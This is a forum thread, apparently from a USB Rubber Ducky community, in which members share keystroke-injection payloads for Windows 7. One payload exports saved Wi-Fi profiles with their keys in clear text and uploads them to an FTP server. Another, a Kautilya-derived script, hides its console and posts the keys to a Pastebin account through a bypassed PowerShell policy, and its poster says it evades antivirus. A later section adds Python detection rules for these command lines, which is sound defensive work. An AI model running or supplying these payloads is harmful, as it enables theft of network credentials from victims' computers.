Bucky67GTO Posted December 28, 2012

For Windows 7... This script will export the Wi-Fi settings, then send them to an FTP server of your choice. The cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but it works in under a minute.

REM open the Start menu and launch a command prompt
DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
ENTER
DELAY 400
REM export every WLAN profile to XML; key=clear asks for the key material unencrypted
STRING netsh wlan export profile key=clear
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
REM -i turns off per-file prompting; FTPSERVER, LOGIN NAME and LOGIN PASSWORD are placeholders
STRING ftp -i FTPSERVER
ENTER
DELAY 400
STRING LOGIN NAME
ENTER
DELAY 400
STRING LOGIN PASSWORD
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
REM upload all exported profiles, then disconnect
STRING MPUT *.xml
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
REM remove the exports and close the console window (ALT+SPACE, C)
STRING del *.xml
ENTER
DELAY 200
ALT SPACE
STRING c
C3PBRO Posted December 28, 2012

Wow, not too bad for your first script! Keep it up.

PineDominator Posted December 28, 2012

Needs to be added to the wiki :-)

Bucky67GTO (Author) Posted January 1, 2013

Has anyone used it yet? How does it work for you? Ideas for improvement?
mreidiv Posted January 3, 2013 (edited)

I ran the cmd netsh wlan export profile key=clear and I do not see the password in clear text, just a long string of numbers and letters, which means it is encrypted. You cannot reinstall the exported profile on a new machine because the hash is machine-specific.

Edited January 3, 2013 by mreidiv
DrDinosaur Posted January 3, 2013 (edited)

There is a Kautilya payload that exports WLAN passwords to a Pastebin account. It has also been added to DuckSauce v.02. I'll add it here if anyone wants to try it out. It works perfectly on my Teensy with Kautilya, so it can probably work on the Ducky. This is undetected by Bitdefender Total Security 2013 if anyone was wondering.

REM Description: Grabs WLAN Key information
REM Author: Converted from Kautilya by Prickleypaw
REM DuckSauce v0.2 by Prickleypaw
REM ---- Command Prompt DuckSauce v.02 ----
ESCAPE
CONTROL ESCAPE
REM open a console shrunk to one line and titled "Installing Drivers"
STRING cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers"
ENTER
DELAY 250
REM write the PowerShell script to %temp%\wlan.ps1 line by line (^| is an escaped pipe for cmd)
STRING echo $wlans = netsh wlan show profiles ^| Select-String -Pattern "All User Profile" ^| Foreach-Object {$_.ToString()} > %temp%\wlan.ps1
ENTER
STRING echo $exportdata = $wlans ^| Foreach-Object {$_.Replace(" All User Profile : ",$null)} >> %temp%\wlan.ps1
ENTER
STRING echo $data = $exportdata ^| ForEach-Object {netsh wlan show profiles name="$_" key=clear} >> %temp%\wlan.ps1
ENTER
STRING echo Function Post_http($url,$parameters) >> %temp%\wlan.ps1
ENTER
STRING echo { >> %temp%\wlan.ps1
ENTER
STRING echo $http_request = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\wlan.ps1
ENTER
STRING echo $http_request.open("POST", $url, $false) >> %temp%\wlan.ps1
ENTER
STRING echo $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") >> %temp%\wlan.ps1
ENTER
STRING echo $http_request.setRequestHeader("Content-length", $parameters.length); >> %temp%\wlan.ps1
ENTER
STRING echo $http_request.setRequestHeader("Connection", "close") >> %temp%\wlan.ps1
ENTER
STRING echo $http_request.send($parameters) >> %temp%\wlan.ps1
ENTER
STRING echo $script:session_key=$http_request.responseText >> %temp%\wlan.ps1
ENTER
STRING echo $session_key >> %temp%\wlan.ps1
ENTER
STRING echo } >> %temp%\wlan.ps1
ENTER
REM ---- need to enter Pastebin information below ----
STRING echo Post_http "http://pastebin.com/api/api_login.php" "api_dev_key=INPUT2&api_user_name=INPUT0&api_user_password=INPUT1" >> %temp%\wlan.ps1
ENTER
STRING echo Post_http "http://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=INPUT2&api_paste_name=Wlan_Info&api_paste_code=$data&api_paste_private=2" >> %temp%\wlan.ps1
ENTER
REM a VBScript wrapper runs PowerShell with a hidden window (0) and waits for it (true)
STRING echo Set oShell = CreateObject("WScript.Shell") > %temp%\wlan.vbs
ENTER
STRING echo oShell.Run("powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\wlan.ps1"),0,true >> %temp%\wlan.vbs
ENTER
STRING wscript %temp%\wlan.vbs
ENTER
STRING exit
ENTER
STRING exit

Edited January 3, 2013 by DrDinosaur
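From the defender's side, an added example (not code from this thread, from Kautilya or from DuckSauce): the Python below checks process-creation command lines for the traces the two payloads above leave (netsh wlan with key=clear, a console shrunk to one line, ftp -i, PowerShell run with -ExecutionPolicy Bypass on a %temp% script) and correlates a key dump with an outbound-capable tool started shortly after it. The records are constructed sample data whose field names follow Sysmon Event ID 1; the rule names and the two-minute window are this example's own choices.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records in the style of Sysmon Event ID 1
# (sample data for this example, not real logs). "t" is an ISO-8601 timestamp.
SAMPLE_EVENTS = [
    {"t": "2013-01-03T10:00:00", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers"'},
    {"t": "2013-01-03T10:00:01", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan export profile key=clear"},
    {"t": "2013-01-03T10:00:02", "Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp -i FTPSERVER"},
    {"t": "2013-01-03T11:30:00", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan show profiles"},  # benign: no key=clear
    {"t": "2013-01-03T11:31:00", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -noLogo -command C:\Users\u\AppData\Local\Temp\wlan.ps1"},
]

# Command-line patterns taken from the payloads in this thread (case-insensitive).
RULES = [
    ("wlan_key_dump", re.compile(r"netsh\s+wlan\s+(export\s+profile|show\s+profiles?).*key\s*=\s*clear", re.I)),
    ("hidden_console", re.compile(r"mode\s+con:?\s*COLS=\d{1,2}\s+LINES=1", re.I)),
    ("ps_bypass_temp_script", re.compile(r"powershell(\.exe)?.*-ExecutionPolicy\s+Bypass.*\\Temp\\.*\.ps1", re.I)),
    ("cli_ftp_client", re.compile(r"(^|\\)ftp(\.exe)?\s+-i\b", re.I)),
]
# Rules that indicate a tool able to move the dumped keys off the host.
FOLLOWUP_RULES = {"cli_ftp_client", "ps_bypass_temp_script"}

def match_rules(event):
    """Return the names of all rules whose pattern matches the event's command line."""
    return [name for name, rx in RULES if rx.search(event["CommandLine"])]

def find_exfil_chains(events, window=timedelta(minutes=2)):
    """Pair each key dump with outbound-capable tools started within `window` after it."""
    ordered = sorted(events, key=lambda e: e["t"])   # ISO-8601 strings sort chronologically
    chains = []
    for i, ev in enumerate(ordered):
        if "wlan_key_dump" not in match_rules(ev):
            continue
        t0 = datetime.fromisoformat(ev["t"])
        for later in ordered[i + 1:]:
            if datetime.fromisoformat(later["t"]) - t0 > window:
                break                                  # outside the correlation window
            for hit in sorted(FOLLOWUP_RULES.intersection(match_rules(later))):
                chains.append((ev["t"], hit))          # (time of the dump, follow-up rule)
    return chains
```

On the sample data, find_exfil_chains(SAMPLE_EVENTS) reports only the 10:00:01 dump followed by ftp -i; the later netsh wlan show profiles without key=clear raises nothing, and the PowerShell launch is flagged on its own but not chained.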
Bucky67GTO (Author) Posted January 9, 2013

Sadly, it seems you are correct. I ran it on my machine and got it unfiltered; I ran it on a client and it came up encrypted. I'm not sure the user I tested on was an administrator of the machine; I know I am. Wondering if that is the issue?